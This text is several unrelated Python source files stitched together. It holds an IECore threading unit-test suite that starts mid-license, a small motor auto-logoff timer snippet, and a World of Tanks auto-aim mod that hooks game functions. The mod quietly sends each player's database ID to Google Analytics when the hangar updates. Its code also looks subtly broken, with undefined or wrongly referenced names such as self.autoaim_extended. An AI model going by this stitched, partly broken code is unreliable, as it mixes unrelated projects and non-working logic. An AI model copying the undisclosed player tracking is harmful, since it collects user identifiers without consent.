# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import time
import threading
import random
import os
import IECore
class ThreadingTest( unittest.TestCase ) :
def callSomeThings( self, things, args=(), kwArgs=(), threaded=False, iterations=1 ) :
for i in range( 0, iterations ) :
threads = []
for j in range( 0, len( things ) ) :
a = args[j] if args else ()
kwa = kwArgs[j] if kwArgs else {}
if threaded :
t = threading.Thread( target=things[j], args=a, kwargs=kwa )
t.start()
threads.append( t )
else :
things[j]( *a, **kwa )
for t in threads :
t.join()
def testThreadedOpGains( self ) :
## Checks that we actually get a speedup by running a bunch of slow
# C++ ops in parallel.
ops = []
kwArgs = []
for i in range( 0, 4 ) :
ops.append( IECore.PointDistributionOp() )
kwArgs.append( {
"mesh" : IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ),
"density" : 10000,
} )
tStart = time.time()
self.callSomeThings( ops, kwArgs=kwArgs, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
self.callSomeThings( ops, kwArgs=kwArgs, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # may fail on single core machines or machines under varying load
def testThreadedReaders( self ) :
## Checks that we can read a bunch of files in parallel, even when one
# of the Readers is implemented in python. We're using the CachedReader
# here as it forces a call to Reader::create when the GIL isn't held yet.
args = [
( "test/IECore/data/exrFiles/ramp.exr", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/exrFiles/checkerAnimated.0006.exr", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/tiff/toTrace.tif", ),
( "test/IECore/data/tiff/toTraceThinned.tif", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/exrFiles/checkerAnimated.0006.exr", ),
( "test/IECore/data/exrFiles/checkerAnimated.0006.exr", ),
( "test/IECore/data/tiff/toTraceThinned.tif", ),
]
sp = IECore.SearchPath( "./", ":" )
calls = [ lambda f : IECore.CachedReader( sp, IECore.ObjectPool(1024 * 1024 * 10) ).read( f ) ] * len( args )
self.callSomeThings( calls, args, threaded=True )
def testMixedCPPAndPython( self ) :
## Checks that we can mix a bunch of C++ and python ops concurrently
# without crashing
ops = []
kwArgs = []
for i in range( 0, 4 ) :
ops.append( IECore.PointDistributionOp() )
kwArgs.append( {
"mesh" : IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ),
"density" : 10000,
} )
ops.append( IECore.ClassLsOp() )
kwArgs.append( { "type" : "op" } )
self.callSomeThings( ops, kwArgs=kwArgs, threaded=True, iterations=5 )
def testReadingGains( self ) :
## Checks that we can use a bunch of readers in different threads and
# that we get a speedup of some sort doing that.
args = [
( "test/IECore/data/exrFiles/ramp.exr", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/pdcFiles/particleMesh.pdc", ),
( "test/IECore/data/cobFiles/ball.cob", ),
( "test/IECore/data/jpg/21mm.jpg", ),
( "test/IECore/data/jpg/exif.jpg", ),
( "test/IECore/data/dpx/ramp.dpx", ),
]
calls = [ lambda f : IECore.Reader.create( f ).read() ] * len( args )
tStart = time.time()
self.callSomeThings( calls, args, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
self.callSomeThings( calls, args, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # this could plausibly fail due to varying load on the machine / io but generally shouldn't
def testWritingGains( self ) :
image = IECore.Reader.create( "test/IECore/data/jpg/21mm.jpg" ).read()
def write( o, f ) :
IECore.Writer.create( o, f ).write()
calls = []
for i in range( 0, 4 ) :
fileName = "test/IECore/test%d.jpg" % i
calls.append( IECore.curry( write, image, fileName ) )
tStart = time.time()
self.callSomeThings( calls, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
self.callSomeThings( calls, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # this could plausibly fail due to varying load on the machine / io but generally shouldn't
def testCachedReaderConcurrency( self ) :
args = [
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/cobFiles/intDataTen.cob", ),
( "test/IECore/data/cobFiles/intDataTen.cob", ),
( "test/IECore/data/cobFiles/pSphereShape1.cob", ),
( "test/IECore/data/cobFiles/pSphereShape1.cob", ),
( "test/IECore/data/cobFiles/pSphereShape1.cob", ),
( "test/IECore/data/cobFiles/pSphereShape1.cob", ),
]
cachedReader = IECore.CachedReader( IECore.SearchPath( "./", ":" ) )
calls = [ lambda f : cachedReader.read( f ) ] * len( args )
for i in range( 0, 5 ) :
cachedReader.clear()
self.callSomeThings( calls, args=args, threaded=True )
def testCachedReaderGains( self ) :
args = [
( "test/IECore/data/jpg/21mm.jpg", ),
( "test/IECore/data/jpg/exif.jpg", ),
( "test/IECore/data/jpg/greyscaleCheckerBoard.jpg", ),
( "test/IECore/data/dpx/ramp.dpx", ),
] * 4
cachedReader = IECore.CachedReader( IECore.SearchPath( "./", ":" ) )
calls = [ lambda f : cachedReader.read( f ) ] * len( args )
tStart = time.time()
cachedReader.clear()
self.callSomeThings( calls, args=args, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
cachedReader.clear()
self.callSomeThings( calls, args=args, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # this could plausibly fail due to varying load on the machine / io but generally shouldn't
def testPythonColorConverterWithThread( self ) :
def NewSRGBToLinear( inputColorSpace, outputColorSpace ) :
converter = IECore.SRGBToLinearOp()
return converter
IECore.ColorSpaceTransformOp.registerConversion(
"newSRGB", "linear", NewSRGBToLinear
)
runThread = True
def test():
while runThread :
pass
newThread = threading.Thread(target=test)
newThread.start()
reader = IECore.Reader.create( "test/IECore/data/cinFiles/uvMap.512x256.cin" )
reader['colorSpace'] = 'newSRGB'
reader.read()
runThread = False
newThread.join()
def testInterpolatedCacheGains( self ) :
numObjects = 100
numAttrs = 2
def createCache( fileName ) :
data = IECore.V3fVectorData( [ IECore.V3f( 1 ) ] * 50000 )
cache = IECore.AttributeCache( fileName, IECore.IndexedIO.OpenMode.Write )
for i in range( 0, numObjects ) :
for j in range( 0, numAttrs ) :
cache.write( "object%d" % i, "attr%d" % j, data )
createCache( "test/IECore/interpolatedCache.0250.fio" )
createCache( "test/IECore/interpolatedCache.0500.fio" )
cache = IECore.InterpolatedCache(
"test/IECore/interpolatedCache.####.fio",
IECore.InterpolatedCache.Interpolation.Linear,
)
calls = []
for i in range( 0, 200 ) :
calls.append(
IECore.curry(
cache.read,
1.5,
"object%d" % random.uniform( 0, numObjects ),
"attr%d" % random.uniform( 0, numAttrs )
)
)
tStart = time.time()
self.callSomeThings( calls, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
self.callSomeThings( calls, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # this could plausibly fail due to varying load on the machine / io but generally shouldn't
def tearDown( self ) :
for f in [
"test/IECore/test0.jpg",
"test/IECore/test1.jpg",
"test/IECore/test2.jpg",
"test/IECore/test3.jpg",
"test/IECore/interpolatedCache.0250.fio",
"test/IECore/interpolatedCache.0500.fio",
] :
if os.path.exists( f ) :
os.remove( f )
if __name__ == "__main__":
unittest.main()
|
temp_var.py
|
def auto_logoff():
while tempvar.count_time_logoff < 600:
tempvar.count_time_logoff += 1
print(tempvar.count_time_logoff)
time.sleep(1)
motor_stop()
return exit()
def notresponding():
while tempvar.count_time_stop_if_not_responding < 5:
tempvar.count_time_stop_if_not_responding += 1
print(tempvar.count_time_stop_if_not_responding)
time.sleep(1)
motor_stop()
# tt1 = Thread(target=auto_logoff)
# tt2 = Thread(target=notresponding)
# tt1.daemon = True
# tt2.daemon = True
# tt1.start()
# tt2.start()
|
mod_autoaim_extended309.py
|
# -*- coding: utf-8 -*-
import os
import re
import json
import codecs
import datetime
import threading
import urllib
import urllib2
import math
import BigWorld
import GUI
import Vehicle
import Math
from constants import AUTH_REALM
from Avatar import PlayerAvatar
from AvatarInputHandler import cameras
from BattleReplay import BattleReplay
from gui.Scaleform.daapi.view.lobby.hangar.Hangar import Hangar
from tutorial.gui.Scaleform.battle import layout
from helpers import isPlayerAvatar
from gui.Scaleform.Battle import Battle
class Config(object):
def __init__(self):
self.enable = True
self.debug = False
self.ru = True if 'RU' in AUTH_REALM else False
self.version = 'v3.09(18.11.2015)'
self.author = 'by spoter'
self.description = 'autoaim_extended'
self.description_ru = 'Мод: "Индикатор'
self.author_ru = 'автор: spoter'
self.name = 'autoaim_extended'
self.description_analytics = 'Мод: "Индикатор'
self.tid = 'UA-57975916-6'
self.sys_mes = {}
self.setup = {'MODIFIER': {'MODIFIER_NONE': 0, 'MODIFIER_SHIFT': 1, 'MODIFIER_CTRL': 2, 'MODIFIER_ALT': 4}}
self._thread_analytics = None
self.analytics_started = False
self.language = None
self.xvm_installed = False
self.xvm_check()
self.res_mods = self.res_mods_init()
self.data = {}
self.default_config()
new_config = self.load_json(self.name, self.data)
self.data = new_config
if 'Русский' in self.data['config'].get('language'): self.ru = True
if self.ru:
self.description = self.description_ru
self.author = self.author_ru
@staticmethod
def res_mods_init():
wd = os.path.dirname(os.path.realpath(__file__))
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
return wd
def xvm_check(self):
try:
#
import xvm_main
self.xvm_installed = True
except StandardError:
pass
def default_config(self):
self.data = {
'config': {
'enable': True, 'debug': False, 'color': 'wg_enemy', 'indicators': {'model': True, 'direction': True, 'box': True}, 'language': 'Русский'
}, 'language': {
'Русский': {
}, 'English': {
}
}
}
def do_config(self):
self.enable = self.data['config'].get('enable', False)
self.debug = self.data['config'].get('debug', False)
if self.data['config'].get('language') in self.data['language']:
self.language = self.data['language'].get(self.data['config'].get('language'))
else:
self.data['config']['language'] = 'English'
self.language = self.data['language'].get('English')
def byte_ify(self, inputs):
if inputs:
if isinstance(inputs, dict):
return {self.byte_ify(key): self.byte_ify(value) for key, value in inputs.iteritems()}
elif isinstance(inputs, list):
return [self.byte_ify(element) for element in inputs]
elif isinstance(inputs, unicode):
return inputs.encode('utf-8')
else:
return inputs
return inputs
@staticmethod
def json_comments(text):
regex = r'\s*(#|\/{2}).*$'
regex_inline = r'(:?(?:\s)*([A-Za-z\d\.{}]*)|((?<=\").*\"),?)(?:\s)*(((#|(\/{2})).*)|)$'
lines = text.split('\n')
excluded = []
for index, line in enumerate(lines):
if re.search(regex, line):
if re.search(r'^' + regex, line, re.IGNORECASE):
excluded.append(lines[index])
elif re.search(regex_inline, line):
lines[index] = re.sub(regex_inline, r'\1', line)
for line in excluded:
lines.remove(line)
return '\n'.join(lines)
def load_json(self, name, config_old, save=False):
config_new = config_old
path = './res_mods/configs/spoter_mods/%s/' % self.name
if not os.path.exists(path):
os.makedirs(path)
new_path = '%s%s.json' % (path, name)
if save:
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
else:
if os.path.isfile(new_path):
try:
with codecs.open(new_path, 'r', encoding='utf-8-sig') as json_file:
data = self.json_comments(json_file.read().decode('utf-8-sig'))
config_new = self.byte_ify(json.loads(data))
json_file.close()
except Exception as e:
self.sys_mess()
print '%s%s' % (self.sys_mes['ERROR'], e)
else:
self.sys_mess()
print '%s[%s, %s %s]' % (self.sys_mes['ERROR'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG'])
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG_DONE'])
return config_new
@staticmethod
def code_pa(text):
try:
return text.encode('windows-1251')
except StandardError:
return text
def debugs(self, text):
if self.debug:
try:
text = text.encode('windows-1251')
except StandardError:
pass
print '%s%s [%s]: %s' % (datetime.datetime.now(), self.sys_mes['DEBUG'], self.code_pa(self.description), text)
def analytics_do(self):
if not self.analytics_started:
player = BigWorld.player()
param = urllib.urlencode({
'v': 1, # Version.
'tid': '%s' % self.tid, # Tracking ID / Property ID.
'cid': player.databaseID, # Anonymous Client ID.
't': 'screenview', # Screenview hit type.
'an': '%s' % self.description_analytics, # App name.
'av': '%s %s' % (self.description_analytics, self.version), # App version.
'cd': 'start [%s]' % AUTH_REALM # Screen name / content description.
})
self.debugs('http://www.google-analytics.com/collect?%s' % param)
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
def analytics(self):
self._thread_analytics = threading.Thread(target=self.analytics_do, name='Thread')
self._thread_analytics.start()
def sys_mess(self):
self.sys_mes = {
'DEBUG': '[DEBUG]', 'LOAD_MOD': self.code_pa('[ЗАГРУЗКА]: ') if self.ru else '[LOAD_MOD]: ', 'INFO': self.code_pa('[ИНФО]: ') if self.ru else '[INFO]: ',
'ERROR': self.code_pa('[ОШИБКА]: ') if self.ru else '[ERROR]: ',
'MSG_RECREATE_CONFIG': self.code_pa('конфиг не найден, создаем заново') if self.ru else 'Config not found, recreating',
'MSG_RECREATE_CONFIG_DONE': self.code_pa('конфиг создан УСПЕШНО') if self.ru else 'Config recreating DONE',
'MSG_INIT': self.code_pa('применение настроек...') if self.ru else 'initialized ...', 'MSG_LANGUAGE_SET': self.code_pa('Выбран язык:') if self.ru else 'Language set to:',
'MSG_DISABLED': self.code_pa('отключен ...') if self.ru else 'disabled ...'
}
def load_mod(self):
self.do_config()
self.sys_mess()
print ''
print '%s[%s, %s]' % (self.sys_mes['LOAD_MOD'], self.code_pa(self.description), self.code_pa(self.author))
if self.enable:
self.debugs('Debug Activated ...')
print '%s[%s %s %s...]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.sys_mes['MSG_LANGUAGE_SET'], self.code_pa(self.data['config'].get('language')))
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_INIT'])
else:
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_DISABLED'])
print ''
class AutoAim(object):
def __init__(self):
self.autoaim_vehicle = None
self.view_edge_callback = None
self.view_direction_callback = None
self._box = None
self._model = None
self._model_blank = None
self._direction = None
self._create_config()
self._load_config()
def _create_config(self):
self.indicatorModel = True
self.indicatorEdge = False
self.indicatorDirection = True
self.indicatorBox = True
self._path = 'objects/autoaim_extended/'
self._box = None
self._box_tex = '%swg_enemy/box.dds' % self._path
self._model = None
self._model_tex = '%swg_enemy/marker.model' % self._path
self._model_blank = None
self._model_blank_text = '%sempty/marker.model' % self._path
self._direction = None
self.angle_autoaim = math.radians(1.28915504)
self._color = 'wg_enemy'
self._autoaim = (0.8588235294, 0.01568627451, 0, 1)
self._enemy = (1, 0, 0, 0.5)
self._friend = (0, 1, 0, 0.5)
self._flag = (1, 1, 1, 1)
self._autoaim_def = (0.2, 0.2, 0.2, 0.5)
self._enemy_def = (1, 0, 0, 0.5)
self._friend_def = (0, 1, 0, 0.5)
self._flag_def = (1, 1, 1, 1)
self._config = {'colors': {}}
self._config['colors']['blue'] = {'rgb': (0, 0, 255), 'edge': (0, 0, 1, 1), 'model': '%sblue/marker.model' % self._path, 'box': '%sblue/box.dds' % self._path}
self._config['colors']['brown'] = {
'rgb': (165, 42, 43), 'edge': (0.6470588235, 0.1647058824, 0.168627451, 1), 'model': '%sbrown/marker.model' % self._path, 'box': '%sbrown/box.dds' % self._path
}
self._config['colors']['chocolate'] = {
'rgb': (211, 105, 30), 'edge': (0.8274509804, 0.4117647059, 0.1176470588, 1), 'model': '%schocolate/marker.model' % self._path, 'box': '%schocolate/box.dds' % self._path
}
self._config['colors']['cornflower_blue'] = {
'rgb': (101, 149, 238), 'edge': (0.3960784314, 0.5843137255, 0.9333333333, 1), 'model': '%scornflower_blue/marker.model' % self._path, 'box': '%scornflower_blue/box.dds' % self._path
}
self._config['colors']['cream'] = {
'rgb': (252, 245, 200), 'edge': (0.9882352941, 0.9607843137, 0.7843137255, 1), 'model': '%scream/marker.model' % self._path, 'box': '%scream/box.dds' % self._path
}
self._config['colors']['cyan'] = {'rgb': (0, 255, 255), 'edge': (0, 1, 1, 1), 'model': '%scyan/marker.model' % self._path, 'box': '%scyan/box.dds' % self._path}
self._config['colors']['emerald'] = {
'rgb': (40, 240, 156), 'edge': (0.1568627451, 0.9411764706, 0.6117647059, 1), 'model': '%semerald/marker.model' % self._path, 'box': '%semerald/box.dds' % self._path
}
self._config['colors']['gold'] = {'rgb': (255, 215, 0), 'edge': (1, 0.8431372549, 0, 1), 'model': '%sgold/marker.model' % self._path, 'box': '%sgold/box.dds' % self._path}
self._config['colors']['green'] = {'rgb': (0, 128, 0), 'edge': (0, 0.5019607843, 0, 1), 'model': '%sgreen/marker.model' % self._path, 'box': '%sgreen/box.dds' % self._path}
self._config['colors']['green_yellow'] = {
'rgb': (173, 255, 46), 'edge': (0.6784313725, 1, 0.1803921569, 1), 'model': '%sgreen_yellow/marker.model' % self._path, 'box': '%sgreen_yellow/box.dds' % self._path
}
self._config['colors']['hot_pink'] = {
'rgb': (255, 105, 181), 'edge': (1, 0.4117647059, 0.7098039216, 1), 'model': '%shot_pink/marker.model' % self._path, 'box': '%shot_pink/box.dds' % self._path
}
self._config['colors']['lime'] = {'rgb': (0, 255, 0), 'edge': (0, 1, 0, 1), 'model': '%slime/marker.model' % self._path, 'box': '%slime/box.dds' % self._path}
self._config['colors']['orange'] = {'rgb': (255, 165, 0), 'edge': (1, 0.6470588235, 0, 1), 'model': '%sorange/marker.model' % self._path, 'box': '%sorange/box.dds' % self._path}
self._config['colors']['pink'] = {'rgb': (255, 192, 203), 'edge': (1, 0.7529411765, 0.7960784314, 1), 'model': '%spink/marker.model' % self._path, 'box': '%spink/box.dds' % self._path}
self._config['colors']['purple'] = {'rgb': (128, 0, 128), 'edge': (0.5019607843, 0, 0.5019607843, 1), 'model': '%spurple/marker.model' % self._path, 'box': '%spurple/box.dds' % self._path}
self._config['colors']['red'] = {'rgb': (255, 0, 0), 'edge': (1, 0, 0, 1), 'model': '%sred/marker.model' % self._path, 'box': '%sred/box.dds' % self._path}
self._config['colors']['wg_blur'] = {
'rgb': (131, 120, 252), 'edge': (0.5137254902, 0.4705882353, 0.9882352941, 1), 'model': '%swg_blur/marker.model' % self._path, 'box': '%swg_blur/box.dds' % self._path
}
self._config['colors']['wg_enemy'] = {
'rgb': (219, 4, 0), 'edge': (0.8588235294, 0.01568627451, 0, 1), 'model': '%swg_enemy/marker.model' % self._path, 'box': '%swg_enemy/box.dds' % self._path
}
self._config['colors']['wg_friend'] = {
'rgb': (128, 214, 57), 'edge': (0.5019607843, 0.8392156863, 0.2235294118, 1), 'model': '%swg_friend/marker.model' % self._path, 'box': '%swg_friend/box.dds' % self._path
}
self._config['colors']['wg_squad'] = {
'rgb': (255, 224, 65), 'edge': (1, 0.8784313725, 0.2549019608, 1), 'model': '%swg_squad/marker.model' % self._path, 'box': '%swg_squad/box.dds' % self._path
}
self._config['colors']['yellow'] = {'rgb': (255, 255, 0), 'edge': (1, 1, 0, 1), 'model': '%syellow/marker.model' % self._path, 'box': '%syellow/box.dds' % self._path}
def _load_config(self):
self._color = config.data['config'].get('color', 'wg_enemy')
config_indicators = config.data['config'].get('indicators')
self.indicatorModel = config_indicators.get('model', True)
self.indicatorDirection = config_indicators.get('direction', True)
self.indicatorBox = config_indicators.get('box', True)
self._box_tex = self._config['colors'][self._color]['box']
self._model_tex = self._config['colors'][self._color]['model']
self._autoaim = self._config['colors'][self._color]['edge']
def find_autoaim_target(self):
auto_aim_vehicle = property(lambda self_other: BigWorld.entities.get(self_other.__autoAimVehID, None))
print('find_autoaim_target', auto_aim_vehicle)
if auto_aim_vehicle is None and BigWorld.target() is not None:
return BigWorld.target()
player = BigWorld.player()
vehicles = player.arena.vehicles
camera_dir, camera_pos = cameras.getWorldRayAndPoint(0, 0)
camera_dir.normalise()
result_len = None
las_vehicle = None
min_radian = 100000.0
for vId, vData in vehicles.items():
if vData['team'] == player.team:
continue
vehicle = BigWorld.entity(vId)
if vehicle is None or not vehicle.isStarted or not vehicle.isAlive():
continue
temp1, radian = self._calc_radian(vehicle.position, self.angle_autoaim) #1.289 градуса в радианах
if not temp1 and temp1 is not None:
continue
length = self._calc_length(vehicle.position, BigWorld.player().position)
if radian:
if result_len is None:
result_len = length
las_vehicle = vehicle
if radian < min_radian and result_len >= length:
min_radian = radian
las_vehicle = vehicle
result = las_vehicle
if result is not None:
if BigWorld.wg_collideSegment(BigWorld.player().spaceID, BigWorld.entity(result.id).appearance.modelsDesc['gun']['model'].position, camera_pos, False) is None:
return result
return BigWorld.target()
@staticmethod
def _calc_length(start_position, end_position):
return (end_position - start_position).length
@staticmethod
def _calc_radian(target_position, angle):
camera_dir, camera_pos = cameras.getWorldRayAndPoint(0, 0)
camera_dir.normalise()
camera_to_target = target_position - camera_pos
a = camera_to_target.dot(camera_dir)
if a < 0:
return False, None
target_radian = camera_to_target.lengthSquared
radian = 1.0 - a * a / target_radian
if radian > angle:
return False, None
return True, radian
@staticmethod
def get_battle_on():
try:
if BigWorld.player().arena: return True
except StandardError: return False
return hasattr(BigWorld.player(), 'arena')
@staticmethod
def get_is_live(vehicle_id):
try: return BigWorld.player().arena.vehicles[vehicle_id]['isAlive']
except StandardError: return False
def get_is_friendly(self, vehicle_id):
player = BigWorld.player()
return self.get_battle_on() and player.arena.vehicles[player.playerVehicleID]['team'] == player.arena.vehicles[vehicle_id]['team']
def create_indicators(self):
if self.indicatorBox:
self.create_box()
if self.indicatorDirection:
self.create_direction()
if self.indicatorModel:
self.create_model()
def install_indicators(self):
self.autoaim_vehicle = None
self.create_indicators()
def uninstall_indicators(self):
self.delete_indicators()
self.autoaim_vehicle = None
self.view_edge_callback = None
self.view_direction_callback = None
def view_indicators(self):
if isinstance(self.autoaim_vehicle, Vehicle.Vehicle) and self.autoaim_vehicle.isStarted and self.get_is_live(self.autoaim_vehicle.id) and not self.get_is_friendly(self.autoaim_vehicle.id):
if self.indicatorBox:
self.view_box()
if self.indicatorEdge:
self.view_edge_callback = BigWorld.callback(0.5, self.view_edge)
if self.indicatorModel:
self.view_model()
if self.indicatorDirection:
self.view_direction_callback = BigWorld.callback(0.5, self.view_direction)
else:
self.autoaim_vehicle = None
def hide_indicators(self):
if self.indicatorBox:
self.hide_box()
if self.indicatorEdge:
if self.view_edge_callback:
self.view_edge_callback = None
if self.indicatorModel:
self.hide_model()
if self.indicatorDirection:
if self.view_direction_callback:
self.view_direction_callback = None
self.hide_direction()
self.autoaim_vehicle = None
def create_box(self):
self._box = GUI.BoundingBox(self._box_tex)
self._box.size = (0.01, 0.01)
self._box.visible = False
GUI.addRoot(self._box)
def create_model(self):
if self._model:
self.delete_model()
if self._model_blank:
self.delete_blank_model()
if self.indicatorModel:
self._model = BigWorld.Model(self._model_tex)
self._model.visible = False
elif self.indicatorEdge and not self.indicatorModel:
self._model_blank = BigWorld.Model(self._model_blank_text)
self._model_blank.visible = False
def create_direction(self):
if self.indicatorDirection:
# noinspection PyProtectedMember
self._direction = layout._DirectionIndicator()
self._direction.component.visible = False
self._direction.active(False)
if self._color in ['cream', 'emerald', 'gold', 'green', 'green_yellow', 'lime', 'wg_friend', 'wg_squad', 'yellow']:
self._direction.setShape('green')
elif self._color in ['brown', 'chocolate', 'orange', 'pink', 'red', 'wg_enemy']:
self._direction.setShape('red')
elif self._color in ['blue', 'cornflower_blue', 'cyan', 'hot_pink', 'purple', 'wg_blur']:
self._direction.setShape('purple')
else:
self._direction.setShape('red')
def view_box(self):
if hasattr(self.autoaim_vehicle, 'model') and self._box:
self._box.source = self.autoaim_vehicle.model.bounds
self._box.visible = True
def view_model(self):
if self._model:
if hasattr(self.autoaim_vehicle, 'appearance'):
self.autoaim_vehicle.appearance.modelsDesc['hull']['model'].node('HP_turretJoint').attach(self._model)
self._model.visible = True
if self._model_blank:
if hasattr(self.autoaim_vehicle, 'appearance'):
self.autoaim_vehicle.appearance.modelsDesc['hull']['model'].node('HP_turretJoint').attach(self._model_blank)
self._model_blank.visible = True
def view_edge(self):
if hasattr(self.autoaim_vehicle, 'appearance') and hasattr(self.autoaim_vehicle, 'model') and self.autoaim_vehicle.isAlive():
BigWorld.wgDelEdgeDetectEntity(self.autoaim_vehicle)
if BigWorld.wg_collideSegment(BigWorld.player().spaceID, self.autoaim_vehicle.appearance.modelsDesc['gun']['model'].position, BigWorld.entity(BigWorld.player(
).playerVehicleID).appearance.modelsDesc['gun']['model'].position, False) is None:
BigWorld.wgSetEdgeDetectColors((Math.Vector4(self._autoaim_def), Math.Vector4(self._enemy), Math.Vector4(self._friend), Math.Vector4(self._autoaim)))
BigWorld.wgAddEdgeDetectEntity(self.autoaim_vehicle, 3, 0)
self.view_edge_callback = BigWorld.callback(0.5, self.view_edge)
def view_direction(self):
try:
if self.autoaim_vehicle is not None and self.get_is_live(self.autoaim_vehicle.id):
self._direction.component.visible = True
self._direction.active(True)
matrix = self.autoaim_vehicle.matrix
if matrix:
m = Math.Matrix(matrix)
pos = m.translation
length = (BigWorld.player().position - pos).length
self._direction.setPosition(pos)
self._direction.setDistance(length)
self.view_direction_callback = BigWorld.callback(0.5, self.view_direction)
except StandardError:
self.view_direction_callback = None
def hide_box(self):
if self._box:
self._box.source = None
self._box.visible = False
def hide_model(self):
if self._model and self._model.visible:
self._model.visible = False
if hasattr(self.autoaim_vehicle, 'appearance'):
turret_position = self.autoaim_vehicle.appearance.modelsDesc['hull']['model'].node('HP_turretJoint')
if turret_position.attachments.length != 0:
turret_position.detach(self._model)
if self._model_blank and self._model_blank.visible:
self._model_blank.visible = False
if hasattr(self.autoaim_vehicle, 'appearance'):
turret_position = self.autoaim_vehicle.appearance.modelsDesc['hull']['model'].node('HP_turretJoint')
if turret_position.attachments.length != 0:
turret_position.detach(self._model_blank)
self.create_model()
def hide_edge(self):
if hasattr(self.autoaim_vehicle, 'appearance'):
BigWorld.wgDelEdgeDetectEntity(self.autoaim_vehicle)
BigWorld.wgSetEdgeDetectColors((Math.Vector4(self._autoaim_def), Math.Vector4(self._enemy_def), Math.Vector4(self._friend_def), Math.Vector4(self._flag_def)))
def hide_direction(self):
if self._direction:
self._direction.component.visible = False
self._direction.active(False)
def delete_indicators(self):
self.delete_direction()
self.delete_box()
self.delete_model()
def delete_direction(self):
if self._direction:
self._direction = None
def delete_box(self):
if self._box:
GUI.delRoot(self._box)
self._box = None
def delete_model(self):
self._model = None
def delete_blank_model(self):
self._model_blank = None
def start_battle(self):
BigWorld.player().arena.onVehicleKilled += self.injected_on_vehicle_killed
self.install_indicators()
def stop_battle(self):
BigWorld.player().arena.onVehicleKilled -= self.injected_on_vehicle_killed
self.hide_indicators()
self.uninstall_indicators()
def injected_on_vehicle_killed(self, target_id, attacker_id, equipment_id, reason):
_, _, _ = attacker_id, reason, equipment_id
if self.autoaim_vehicle and target_id == self.autoaim_vehicle.id:
self.hide_indicators()
if target_id == BigWorld.player().playerVehicleID:
self.hide_indicators()
# deformed functions:
def hook_update_all(self):
hooked_UpdateAll(self)
config.analytics()
def hook_auto_aim(self, target):
if config.enable and not self.autoaim_extended.use:
old_vehicle = autoaim_extended.autoaim_vehicle
if autoaim_extended.autoaim_vehicle:
autoaim_extended.hide_indicators()
if old_vehicle != target:
autoaim_extended.autoaim_vehicle = target
autoaim_extended.view_indicators()
return hooked_autoAim(self, target)
def hook_on_auto_aim_vehicle_lost(self):
if config.enable:
if autoaim_extended.autoaim_vehicle:
autoaim_extended.hide_indicators()
return hooked_onAutoAimVehicleLost(self)
def hook_on_lock_target(self, lock):
if config.enable:
player = BigWorld.player()
if not isPlayerAvatar():
return
if self.isPlaying:
if lock == 1:
player.autoAim(autoaim_extended.find_autoaim_target())
elif lock == 0:
player.autoAim(None)
else:
player.autoAim(None)
elif self.isRecording:
self._BattleReplay__replayCtrl.onLockTarget(lock)
else:
hooked_onLockTarget(self, lock)
def hook_start_battle(self):
hooked_start_battle(self)
if config.enable:
autoaim_extended.start_battle()
def hook_stop_battle(self):
hooked_stop_battle(self)
if config.enable:
autoaim_extended.stop_battle()
class Autoaim_extended():
def __init__(self):
self.use = False
self.target = autoaim_extended.autoaim_vehicle
def start(self, target):
if not self.use:
self.use = True
if config.enable:
old_vehicle = autoaim_extended.autoaim_vehicle
if autoaim_extended.autoaim_vehicle:
autoaim_extended.hide_indicators()
if old_vehicle != target:
autoaim_extended.autoaim_vehicle = target
autoaim_extended.view_indicators()
return True
return
def stop(self):
if not self.use:
self.use = True
if config.enable:
if autoaim_extended.autoaim_vehicle:
autoaim_extended.hide_indicators()
return True
return
#hooked
# noinspection PyProtectedMember
hooked_UpdateAll = Hangar._Hangar__updateAll
hooked_autoAim = PlayerAvatar.autoAim
hooked_onAutoAimVehicleLost = PlayerAvatar.onAutoAimVehicleLost
hooked_onLockTarget = BattleReplay.onLockTarget
